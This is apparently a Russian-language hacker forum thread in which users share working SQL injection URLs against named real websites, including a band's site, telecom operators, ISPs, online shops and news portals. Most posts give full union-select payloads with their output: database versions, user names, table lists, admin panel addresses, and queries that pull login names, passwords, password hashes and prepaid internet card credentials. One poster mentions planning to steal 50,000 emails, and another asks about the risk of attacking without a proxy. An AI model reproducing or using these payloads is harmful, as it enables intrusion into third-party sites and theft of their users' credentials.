5.0.21-Debian_3ubuntu1-log 4.1.20 4.1.22-standard-log 5.0.45-log 5.0.67-log [email protected] winemakershop
information_schema.CHARACTER_SETS information_schema.COLLATIONS information_schema.VIEWS information_schema.USER_PRIVILEGES information_schema.TRIGGERS information_schema.TABLE_PRIVILEGES information_schema.TABLE_CONSTRAINTS information_schema.TABLES information_schema.STATISTICS information_schema.SCHEMA_PRIVILEGES information_schema.SCHEMATA information_schema.ROUTINES information_schema.KEY_COLUMN_USAGE information_schema.COLUMN_PRIVILEGES information_schema.COLUMNS information_schema.COLLATION_CHARACTER_SET_APPLICABILITY datingfunda.dating_astrology astro_id astro_name astro_desc astro_start_date astro_end_date datingfunda.dating_blockmail blockmail_id blocker_id blocked_id doe datingfunda.dating_country country_id country_name datingfunda.dating_astro_comp datingfunda.dating_album_photos datingfunda.dating_album datingfunda.dating_adminmembers id username password usertype valid lastlogin datingfunda.change_email member_id old_email new_email membercode valid Схватил скуль в давнишней теме, и решил ее дальше раскрутить и мыла стащить все 50к, но перехотелось . А самый прикол что в Админке показывает что 50к мыл, а вот в базе тольок 72 мыла )) Всю базу перерыл...
Тут Официальный сайт группы "Ляпис Трубецкой" не было ? Code: http://www.lyapis.com/ photo.php? cl=18+union+select+1,2,3,4,concat(user(),0x3a,version())-- Будет *) Database Version: 5.0.67-community Database name: lyapis_lyapis User name: lyapis_lyapis@localhost Таблицы: access adminhelp administrator adminlog adminmessage adminutil announcement announcementread attachment attachmentpermission attachmenttype attachmentviews avatar bbcode calendar calendarcustomfield calendarmoderator calendarpermission cpsession cron cronlog customavatar customprofilepic datastore deletionlog editlog event externalcache faq forum forumpermission forumread holiday icon imagecategory imagecategorypermission infraction infractionban infractiongroup infractionlevel language mailqueue moderation moderator moderatorlog passwordhistory paymentapi paymentinfo paymenttransaction phrase phrasetype plugin pm pmreceipt pmtext podcast podcastitem poll pollvote post posthash postindex postparsed product productcode productdependency profilefield profilefieldcategory ranks regimage reminder reputation reputationlevel rssfeed rsslog search session setting settinggroup sigparsed sigpic smilie stats strikes style subscribeevent subscribeforum subscribethread subscription subscriptionlog subscriptionpermission tachyforumpost tachythreadpost template templatehistory thread threadrate threadread threadredirect threadviews upgradelog user useractivation userban userfield usergroup usergroupleader usergrouprequest userlist usernote userpromotion usertextfield usertitle word albums anonses articles content email email2send galleries metatags news news_settings newsletter pictures users_cp Извиняюсь если что-то не так я новенький в этом.....
http://www.chattel.us/projects/details_content.php?p=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a3a,username,password),13+from+users+limit+0,1-- http://www.chattel.us/admin/
Code: http://www.alivaria.by/ru/catalogue/8.html?template=20+un ion+select+1,2,version(),4,version()+limit+1,1-- 5.0.51a-community-log alivaria_cms@localhost alivaria_cms
СтримТВ Code: http://tv.stream.ru/programs/channel/?ch_id=999999999999999+union+select+version(),2,concat_ws(0x3a3a,login,password)+from+user+limit+10,1--%20&dws=2 Логинов почему то в таблице мало и в стандартную авторизацию они не проходят, следовательно либо таблица неактуальная, либо это логины манагеров properm - достаточно крупный Пермский портал. Code: http://weather.properm.ru/-1+union+select+version(),version(),USER(),4+from+information_schema.tables--%20.html
www.lancktelecom.ru «ЛАНК Телеком» — один из ведущих операторов Санкт-Петербурга, обеспечивающий полный комплекс телекоммуникационных услуг для частных лиц и корпоративных пользователей: http://www.lancktelecom.ru/news/actions/id20498989+union+select+1,concat(name,char(58),password),3,4,5,6,7,8+from+users/* http://www.lancktelecom.ru/admin/index.php =))
оффтопик можно? Насколько опасно скулю без проксика делать? если я не собираюсь ломать, а попрактиковаться только хочу.
настолько,наскольо они смотрят за серваком...месяцок поживешь на изжоге, если не придут - повезло, придут - неповезло =))
http://www.lanck.ru/index.php?act=cat&div=100+union+select+1,concat( user(), 0x3a,version(),0x3a,database()),3,4,5,6,7,8/* msklanck_mainsql@localhost: 4.0.23a-log: db_msklanck_mainsql Snap : Походу одни и теже делают сайты
В общем мега разработчики http://www.5d.ru/ Все их основные проекты в основном по одному сценарию в параметре ошибка http://www.bladeserver.ru/?act=news&id=7+union+select+1,concat( user(),0x3a, version(),0x3a,database()),3,4,5,6,7,8,9/* [email protected] 4.0.27-log blade
хренасе итаРРТАС -) http://www.itartass.ur.ru/news/?id=40914+union+select+1,version(),3, 4,5,6,7,8,9,10,11,12,13/* Версия 5.0.22-standard Юзер itartass@localhost Датабейс itartass
www.mini-ats.ru, тИЦ=20 Code: http://www.mini-ats.ru/ats.php?idc=-1%27+union+select+111,unhex(hex(concat(version(),':',user(),':',database()))),333,444,555,666/* version() - 5.0.18-debug-log user() - mats@localhost database() - mats похоже там был форум IPB но ссылка на него с главной страницы ведет в никуда(404) Зато все его таблицы есть в БД. Логины и соленые хэши юзеров(бывших) вытаскиваются такой длинной инъекцией: Code: http://www.mini-ats.ru/ats.php?idc=-1'+union+select+111,concat(converge_id,':',unhex(hex(name)),':',unhex(hex(converge_pass_hash)),':',unhex(hex(converge_pass_salt))),333,444,555,666+from+ipb_members_converge,ipb_members+where+converge_id=id+limit+0,1/* можно предположить что какой-то из этих пассов подойдет к админке c базовой авторизацией www.mini-ats.ru/admin ----------------------------------------------------- www.lnet.ru, тИЦ=110 Code: http://www.lnet.ru/list.php?tid=-1+union+select+1,version(),3,4,5,user(),7,8,9,database(),11,12,13,14,15,16,17,18,19,20-- version() - 5.0.22 database() - bvpru_textov user() - bvpru_textov@localhost здесь есть масса таблиц с порнотекстами, что не может не радовать, но есть и таблицы с чем-то напоминающим пароли: autors autors3 system_user этими инъекциями можно просмотреть их содержимое Code: http://www.lnet.ru/list.php?tid=-1+union+select+1,concat(ID,char(0x3A),name,char(0x3A),pass,char(0x3A),status),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+autors+limit+0,1-- http://www.lnet.ru/list.php?tid=-1+union+select+1,concat(ID,char(0x3A),name,char(0x3A),pass,char(0x3A),status),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+autors3+limit+0,1-- http://www.lnet.ru/list.php?tid=-1+union+select+1,concat(id,char(0x3A),login,char(0x3A),password,char(0x3A),name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+system_user+limit+0,1-- здесь есть формы для входа http://www.lnet.ru/admin.php http://www.lnet.ru/autor.php ----------------------------------------------------- 7vbf.info, тИЦ=10 Code: http://7vbf.info/index.php?gl=catalog&cat=-1+union+select+concat(version(),char(0x3A),user(),char(0x3A),database())-- version() - 5.0.51a-15 user() - web22_u1@localhost database() - web22_db1 в таблице moderator есть поля pass и cod. может там еще какие таблицы есть интересные, но по их названиям так не скажешь Code: http://7vbf.info/index.php?gl=catalog&cat=-1+union+select+concat(login,char(0x3A),pass,char(0x3A),cod)+from+moderator+limit+0,1-- ----------------------------------------------------- www.smaster.ru, тИЦ=80 Code: http://www.smaster.ru/next/index.php?pid=-1+union+select+concat(version(),char(0x3A),user(),char(0x3A),database()),2,3,4,5/* version() - 4.1.22-log database() - smaster@localhost user() - wwwsmasterru
Интернет провайдер г. Кировоград Данные интернет карточек: Code: http://www.romb.net/topics/other/?id=-70+union+select+concat_ws(0x3a,CardID,SerialNo,CardUserName,CardPasswd,SeriesID,Active,AccNo,LocationID,SellingDate,SellingAdmin,SellingIP,Discount,FreeBonus,Amount,Entered,SaleRecID)+from+ispbilling.TblPasswdCards+limit+1,1-- Админки не нашел...
Интернет магазин агенства Десси http://www.dessy.ru/cgi-bin/shop.cgi?do=wholepage&id=-20/**/union/**/select/**/1, 2,3,version(),database(),6,user(),8,9,10, 11,12,13,14,15,16,17,18,19,20,21-- 5.0.67-log [email protected] dessyru
Интернет магазин 100 Пудов http://www.zakaz.kr.ua/vitrina/tovar/?lev1=9&lev2=12&lev3=17&id=-170/**/union/**/select/**/1,2, 3,version(),user(), database(),7,8,9,10,11,12,13-- zakazkr_zakaz@localhost 5.0.45-log zakazkr_zakaz
Новостной портал. Вроде бы всё прикрыто но опять же все данные смотрим внутри странички галлереи -) http://kirovograd.rks.kr.ua/photo/gorod/monuments/photo00+ union+select+ database(),version(),user(),4--/ rkskru_rks@localhost 5.0.45-log-3 rkskru_rks
